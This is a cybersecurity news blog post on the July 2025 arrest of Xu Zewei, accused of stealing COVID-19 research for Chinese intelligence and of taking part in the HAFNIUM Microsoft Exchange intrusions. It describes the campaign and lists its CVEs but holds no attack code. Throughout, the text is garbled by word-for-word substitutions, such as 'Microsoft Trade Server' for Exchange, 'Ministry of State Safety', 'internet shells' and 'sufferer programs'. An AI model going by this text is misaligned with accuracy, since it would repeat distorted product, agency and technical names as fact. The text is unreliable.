Skip to content
  • Blog Home
  • Cyber Map
  • About Us – Contact
  • Disclaimer
  • Terms and Rules
  • Privacy Policy
Cyber Web Spider Blog – News

Cyber Web Spider Blog – News

Globe Threat Map provides a real-time, interactive 3D visualization of global cyber threats. Monitor DDoS attacks, malware, and hacking attempts with geo-located arcs on a rotating globe. Stay informed with live logs and archive stats.

  • Home
  • Cyber Map
  • Cyber Security News
  • Security Week News
  • The Hacker News
  • How To?
  • Toggle search form

Chinese Hackers Exploit Microsoft Exchange Servers to Steal COVID-19 Research Data

Posted on July 9, 2025July 9, 2025 By CWS

A complicated cyberattack orchestrated by Chinese language state-sponsored hackers has uncovered vulnerabilities within the international cybersecurity infrastructure, concentrating on vital COVID-19 analysis from American universities and exploiting Microsoft Trade servers worldwide.

The Justice Division introduced the arrest of a key determine on this operation, marking a big milestone within the combat towards state-sponsored cyber espionage.

Xu Zewei, a 33-year-old Chinese language nationwide, was arrested in Milan, Italy, on July 3, 2025, following a U.S. extradition request.

The arrest represents one of many first profitable captures of hackers related to Chinese language intelligence companies by the FBI. Xu faces a nine-count federal indictment alongside his co-defendant Zhang Yu, who stays at massive.

The fees embody conspiracy to commit wire fraud, acquiring data by unauthorized entry to protected computer systems, intentional injury to protected computer systems, and aggravated id theft. If convicted on all counts, Xu may withstand 77 years in jail.

The COVID-19 Analysis Theft Marketing campaign

Between February 2020 and June 2021, Xu and his associates carried out a scientific marketing campaign to steal vital COVID-19 analysis from American establishments.

Working below the path of China’s Ministry of State Safety (MSS) and its Shanghai State Safety Bureau (SSSB), the hackers focused U.S. universities, immunologists, and virologists engaged in growing vaccines, remedies, and testing protocols.

Court docket paperwork reveal that on February 19, 2020, Xu confirmed to his SSSB handler that he had efficiently compromised the community of a analysis college within the Southern District of Texas.

Three days later, the SSSB officer directed Xu to particularly goal electronic mail accounts belonging to virologists and immunologists conducting COVID-19 analysis. Xu subsequently confirmed he had acquired the contents of those researchers’ mailboxes.

The HAFNIUM Marketing campaign

The cyber espionage operation expanded dramatically in late 2020 when Xu and his co-conspirators started exploiting zero-day vulnerabilities in Microsoft Trade Server.

This large marketing campaign, publicly often known as “HAFNIUM,” compromised hundreds of computer systems worldwide.

The assault leveraged 4 vital vulnerabilities (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065) that allowed attackers to realize persistent entry to sufferer programs.

The HAFNIUM group efficiently focused over 60,000 U.S. entities, compromising greater than 12,700 organizations. Victims included universities, regulation companies, protection contractors, and authorities businesses.

The attackers put in internet shells on compromised servers, offering them with distant entry capabilities for knowledge theft and lateral motion inside networks.

The Microsoft Trade Server exploitation marketing campaign had unprecedented international attain. By March 2021, it was estimated that roughly 250,000 servers worldwide had fallen sufferer to the assaults.

The European Banking Authority, Norwegian Parliament, and Chile’s Fee for the Monetary Market had been among the many high-profile victims.

Microsoft launched emergency safety updates on March 2, 2021, however the injury was already intensive.

The FBI and the Cybersecurity and Infrastructure Safety Company (CISA) issued a joint advisory warning organizations in regards to the compromise.

In April 2021, the Justice Division carried out a court-authorized operation to take away internet shells from lots of of weak computer systems in the US.

State-Sponsored Operations

The investigation revealed that Xu operated as a contract hacker for Shanghai Powerock Community Co. Ltd., described by prosecutors as one in every of many “enabling” corporations that carried out hacking operations for the Chinese language authorities.

This community of personal corporations and contractors supplied Beijing with believable deniability whereas conducting intensive cyber espionage campaigns.

The MSS and SSSB, China’s principal intelligence companies, immediately supervised and coordinated these operations.

The Shanghai State Safety Bureau, one of the crucial aggressive and internationally lively items of the MSS, maintains an in depth community of entrance corporations and conducts international espionage operations.

The HAFNIUM marketing campaign prompted a coordinated worldwide response.

In July 2021, the US, together with the European Union, the UK, Australia, Canada, New Zealand, Japan, and NATO, formally attributed the assaults to the Chinese language authorities and condemned the PRC’s function in malicious cyber actions.

The arrest of Xu Zewei demonstrates the continued efforts of worldwide regulation enforcement to carry state-sponsored hackers accountable.

“This arrest underscores the US’ affected person and tireless dedication to pursuing hackers who search to steal data belonging to U.S. corporations and universities,” stated John A. Eisenberg, Assistant Legal professional Common for the Nationwide Safety Division.

The HAFNIUM group has since advanced into what safety researchers now observe as “Silk Hurricane,” persevering with to focus on massive companies and authorities entities.

The group has tailored its ways to take advantage of widespread IT options, together with distant administration instruments and cloud functions.

The case highlights the broader problem posed by Chinese language cyber operations, which U.S. officers say exceed these of all different overseas governments mixed.

The Justice Division’s announcement represents a part of a broader crackdown on Chinese language cyber espionage, with a number of current instances concentrating on people accused of working for Beijing’s intelligence companies.

As Xu awaits extradition proceedings in Italy, the case serves as a stark reminder of the persistent risk posed by state-sponsored cyber operations and the vital significance of worldwide cooperation in combating these refined assaults on international cybersecurity infrastructure.

MSSP Pricing Information: The best way to Minimize Via the Noise and the Hidden Price-> Get Your Free Information

Cyber Security News Tags:Chinese, COVID19, Data, Exchange, Exploit, Hackers, Microsoft, Research, Servers, Steal

Post navigation

Previous Post: Windows BitLocker Bypass Vulnerability Let Attackers Bypass Security Feature
Next Post: Microsoft 365 PDF Export LFI Vulnerability Allows Access to Sensitive Server Data

Related Posts

Splunk Enterprise XSS Vulnerability Let Attackers Execute Unauthorized JavaScript Code Cyber Security News
System Admins Beware! Weaponized Putty Ads in Bing Installs Remote Access Tools Cyber Security News
Atomic macOS Info-Stealer Upgraded With New Backdoor to Maintain Persistence Cyber Security News
CISA Warns of Citrix NetScaler ADC and Gateway Vulnerability Actively Exploited in Attacks Cyber Security News
Breaking Down Silos Aligning IT and Security Teams Cyber Security News
Android 16 Comes with Advanced Device-level Security Setting Protection for 3 Billion Devices Cyber Security News

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News

Recent Posts

  • Key Vulnerabilities, Threats, and Data Breaches
  • How to Monitor Your Identity on the Dark Web
  • Meta’s Llama Firewall Bypassed Using Prompt Injection Vulnerability
  • OpenAI is to Launch a AI Web Browser in Coming Weeks
  • WordPress GravityForms Plugin Hacked to Include Malicious Code

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Archives

  • July 2025
  • June 2025
  • May 2025

Recent Posts

  • Key Vulnerabilities, Threats, and Data Breaches
  • How to Monitor Your Identity on the Dark Web
  • Meta’s Llama Firewall Bypassed Using Prompt Injection Vulnerability
  • OpenAI is to Launch a AI Web Browser in Coming Weeks
  • WordPress GravityForms Plugin Hacked to Include Malicious Code

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News